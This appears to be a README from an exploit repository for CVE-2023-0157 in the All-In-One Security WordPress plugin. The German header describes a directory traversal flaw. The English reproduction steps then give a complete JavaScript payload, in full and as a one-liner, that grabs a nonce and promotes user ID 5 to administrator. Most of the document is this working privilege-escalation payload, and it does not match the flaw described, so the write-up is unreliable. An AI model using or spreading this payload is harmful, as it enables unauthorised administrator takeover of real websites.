
Repository für die Schwachstelle CVE-2023-0157.
CVE ID: CVE-2023-0157
Schwachstellentyp: Directory Traversal
Beschreibung: Das All-In-One Security (AIOS)-Plugin für WordPress ist in Versionen bis einschließlich 5.1.4 anfällig für Directory Traversal. Dies ermöglicht authentifizierten Angreifern mit Administratorrechten, den Inhalt beliebiger Dateien auf dem Server zu lesen.
Schritte zur Reproduktion:
Just create a test.pdf file with JavaScript content (necessarily in one line) and display the file in the Host system logs.
An example of a JavaScript payload increasing the privileges of a user with ID 5
<script>
fetch("https://<host>/wp-admin/users.php?update=promote")
.then(function(response) {
return response.text()
})
.then(function(html) {
var parser = new DOMParser();
var doc = parser.parseFromString(html, "text/html");
return doc.querySelector("#_wpnonce").value;
})
.then(function(nonce) {
fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator")
.then(function(response) {
console.log(response.text());
})
.catch(function(err) {
console.log('Failed to fetch page: ', err);
});
})
.catch(function(err) {
console.log('Failed to fetch page: ', err);
});
</script>
Oneliner:
fetch("https://<host>/wp-admin/users.php?update=promote").then(function(response) {return response.text()}).then(function(html) {var parser = new DOMParser();var doc = parser.parseFromString(html, "text/html");return doc.querySelector("#_wpnonce").value;}).then(function(nonce) {fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator").then(function(response) {console.log(response.text());}).catch(function(err) {console.log('Failed to fetch page: ', err); });}).catch(function(err) {console.log('Failed to fetch page: ', err);});
Replace values with <> signs.
Referenz: